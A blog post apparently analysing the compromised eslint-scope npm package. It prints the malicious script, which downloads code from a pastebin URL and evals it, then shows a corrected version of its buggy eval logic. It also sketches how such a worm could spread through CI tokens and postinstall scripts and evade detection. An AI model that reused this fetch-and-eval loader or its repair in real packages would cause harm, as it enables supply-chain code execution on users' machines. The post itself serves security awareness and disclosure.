How to build an npm worm

npm is a registry and package manager for JavaScript that ships as part of Node.js. It's used by tens of millions of people to install hundreds of thousands of packages billions of times every week.

Today it was reported that eslint-scope (an npm package with 59 million downloads) had been compromised.

A new version of the package was published which contained a malicious script that was attempting to spread itself to other npm authors.

This type of script is known as a "worm" and while npm did a good job shutting it down, they lucked out because the script contained a bug which prevented it from spreading and caused it to get reported immediately.

Fluke

I don't think anyone has tried to name this worm yet, so I'm going to come up with a name for the purposes of this post.

I'm going to call it "The Fluke Worm", since a "Fluke" is a type of parasitic worm, and while this worm could have been really bad, we lucked out cause the author fucked up the code.

This was the script (I've cleaned it up for readability):

try {
  var https = require('https');
  https.get({
    hostname: 'pastebin.com',
    path: '/raw/XLeVP82h',
    headers: {
      'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
      'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
  }, response => {
    response.setEncoding('utf8');
    response.on('data', contents => {
      eval(contents);
    });
    response.on('error', () => {});
  }).on('error', () => {});
} catch (err) {}

While the author of Fluke tried really hard to prevent any errors from being thrown (going as far as wrapping an asynchronous https.get call with a synchronous try-catch), it still managed to throw an error (Oh JavaScript, you reliable... you).

If you're wondering what the bug was, they opened a response stream and listened for data but didn't wait until the response closed before eval()-uating the response. Let me fix that for you:

let contents = '';
response.on('data', chunk => {
  contents += chunk.toString();
});
response.on('end', () => {
  eval(contents);
});

But while the script may have its issues, it's important to know what it was attempting to do.

It uses Node's built-in https module in order to (attempt to) make a request to a pastebin url (which has been deleted) and evaluating the contents.

By using a Pastebin, the author of Fluke could have tried to make updates to the worm simply by editing the contents.

Luckily Fluke (as far as we now know) only seems to have infected one major package.

In response, npm has taken the published version of the package down and has invalidated every npm token so that developers will have to login again. They are also advising that you use 2-Factor Authentication.

Worms

Let's take a step back and understand what a worm is.

A "worm" is a piece of malicious code which attempts to spread itself to as many machines as possible.

Worms need something that connect all the computers between it. Most of the time this is the network (either the public internet or private intranets). Although, if you go back far enough you can find worms that spread through floppy disks and such.

In this case, the thing that is connecting us is npm.

npm currently claims to have about 10 million users. Those users include everyone from new programmers in a coding bootcamp to multi-billion dollar corporations.

npm also reports that they have about 5 Billion individual package downloads per week. That's 500 package downloads a week per user.

And that's important because a worm like this can take advantage of how often people are downloading code from the internet in order to spread itself as fast as possible. And it needs to spread as fast as possible in order to infect everyone before being detected.

If this worm hadn't been broken, it could have infected hundreds (maybe even thousands) of packages before being detected.

If it had been more sophisticated, it could have been much harder to kill completely.

Let's quickly talk about how Fluke could have gone down.

In order to grow as fast as possible, Fluke needs to insert itself into something that gets installed by many people. In this case it targeted one of ESLint's internal packages.

ESLint has been downloaded over 130 million times, and its contributors included people who also worked on:

If you keep traversing the graph of packages that depend on one another, as well as the graph of authors who have access to other packages, it doesn't take long to infect the entire registry.

So like... it's a pretty good target.

But how does it get introduced?

Well I'm not sure exactly how it happened in this case, but here's one scenario that I've had to think about in the past.

Pretty much every major open source project out there (at least in the JavaScript/Node community) will have automated CI that runs on pull requests.

This CI is just there to run your tests, and it provides a nice feedback loop to contributors, but since it runs automatically the second a pull request is opened, you need to be careful what that CI process has access to.

Many users of npm (including lots of major open source projects) chose to use Continuous Deployment systems to automatically publish new versions of their npm packages as things get merged into their master branch. Most of the time, this is done in the same CI system as tests.

In order to publish to npm, you need to have a "token" (something to tell npm that you are authenticated). And in order to publish to npm automatically in CI, you need to put this token into your environment variables.

Most of the time, people configure these environment variables in such a way that both your "master" build and your "pull request/branch" build get the same environment variables.

This means that simply by opening a pull request into the right repo, you can gain authorization to publish packages.

Cool.

But then it gets even easier. Now that the worm has infected a major package, anyone who then downloads the package will then also be infected.

If they happen to be logged into the npm registry (which likely the majority of npm users with accounts are) then this worm can easily add itself to any other packages that they have publish access to.

As the worm spreads itself to more and more packages, at some point it is inevitably going to be detected. It may take a couple of hours or in very bad cases a couple of days.

But how could it avoid detection for as long as possible?

Well first we need to know how people would discover it. There's a couple obvious ones:

A "well-designed" worm would know about these sort of things and would take precautions to avoid getting caught.

The better the worm hides, the more time it will have to infect. Security-minded people can do a much better job than the above list.

Any worm presumably has a purpose more than just to infect itself (although maybe someone just wants the bragging rights).

They might want to steal data, they might want to do damage to the machine, these days there's a good chance they want to mine bitcoins on everyone's computer. (Crypto-currencies are stupid and bad, don't @ me)

Because Node runs with full access to the file system and network by default, you can do a whole lot with people's machines. Not to mention the fact that many users run npm with sudo.

Oh, and just in case the worm wants to make sure it doesn't get stopped early on, it might even go as far as continuing to fight even after it's been noticed. There are plenty of ways to do that.

You can see that Fluke was trying to do that by using an editable Pastebin so that it could keep updating the code to do new things.

That's right, worms can be built to auto-update. Finding new creative ways to be a pain in the ass for the people trying to stop them.

Maybe it'll even set up a daemon to keep injecting itself into packages even after it has been removed from them.

Trust

You may be wondering...

What the fuck Jamie? Why are you teaching everyone how to create a worm like this? Do you have to expose it to the entire world?!

For starters, I'm not exposing it to the entire world... That already happened:

Vulnerability Note VU#319816 - "npm fails to restrict the actions of malicious npm packages"

npm allows packages to take actions that could result in a malicious npm package author to create a worm that spreads across the majority of the npm ecosystem.

Thousands of people already know about this vulnerability, and the vast majority of them are completely capable of exploiting it. The only reason people haven't exploited it so far is:

  1. Because they are decent people.
  2. Because they have something to lose if other people start exploiting it.

You see, the truth is that this massive community we've built is built on trust.

npm trusts that its users won't do anything malicious, and if they do, npm trusts that they'll be able to catch it before it does anything too harmful.

Trust is a big deal in the security industry. If you want users to give you control over their data, they need to trust you.

When you lose people's trust, your business is in danger. Just ask Facebook who lost billions of dollars by handing user data over to Cambridge Analytica (and so many others).

If you want to gain and keep users' trust, you need to do everything you can to protect them.

npm

npm knows its security flaws. It's been alerted about them many times. I was joking about them with the COO just the other day.

But look at the response from npm when the ability to build a worm was disclosed over 2 years ago:

Jan 7 2016 – ­­Response from npm

Jan 8 2016 – Confirmation of works as intended no intention to fix at the moment from npm.

There was room to do something more there. And in the two years since then, despite it coming up regularly, the registry hasn't done much to prevent what almost happened today.

They've introduced 2-Factor Authentication, they've introduced lockfiles, they've acquired a Node security startup, and started building auditing tools. And while they all help quite a bit, they don't solve the core problem of publishing with a long-living token.

A worm can still be installed on a logged in machine that has a valid token and publish new versions of packages. A worm can still take advantage of postinstall scripts to spread itself because npm doesn't lock them down at all.

The reason they have stated for not addressing these problems head on is because any security solution would get in the way of users. It'd be harder to publish npm packages, and even harder to automate.

And you see, harder npm publishing means harder npm adoption. My fear is that they are refusing to do something here because they are a startup focused on growth. Their VCs are undoubtably demanding that growth.

Capitalism strikes again I guess.

Sigh.

It's on npm to fix this problem, and until they do we're gonna keep being at risk. And I hate that, I hate being put in this position where I'm the bad guy for trying to raise awareness to something so important.

I got into open source because it was fun. I stayed because I saw how much we can improve the world around us. I take it seriously because I know how much we have to lose.

It bothers me greatly that npm is a private company. It bothers me that npm is closed-source (the registry and server). It bothers me because I can't contribute. I can only inform the community of the problems.

I get it #HugOps. I don't want to ruin anyone at npm's day.

But if npm was open source (not just the client), we wouldn't have to hug ops. We could contribute back. I know there's security engineers at every major company these days that would kill for the opportunity to improve npm's security.

The question comes: Why do we give a private company a monopoly over the Node ecosystem if they refuse to open source their software?

Fix

But the reason I really wanted to write this article is that I want things to get better. I don't want worms to be successful because the community was uneducated on how they work and what to do about them.

Security through obscurity is thankfully pretty effective, but it's dangerous to build something important on. The npm ecosystem and community play a vital role in how many people in the world write code. They shouldn't depend on security through obscurity.

So npm has lost some trust today, and now we find ourselves in the position where we need to protect ourselves from npm.

npm has already revoked all your tokens, but please:

But honestly, the amount of work we'd all need to put in to truly prevent this from happening again... it's just never going to happen.

You can ask each individual user to go out of their way to voluntarily secure themselves, but the reality is that most won't. Most won't even hear the message that they need to.

And the next worm might not be a fluke.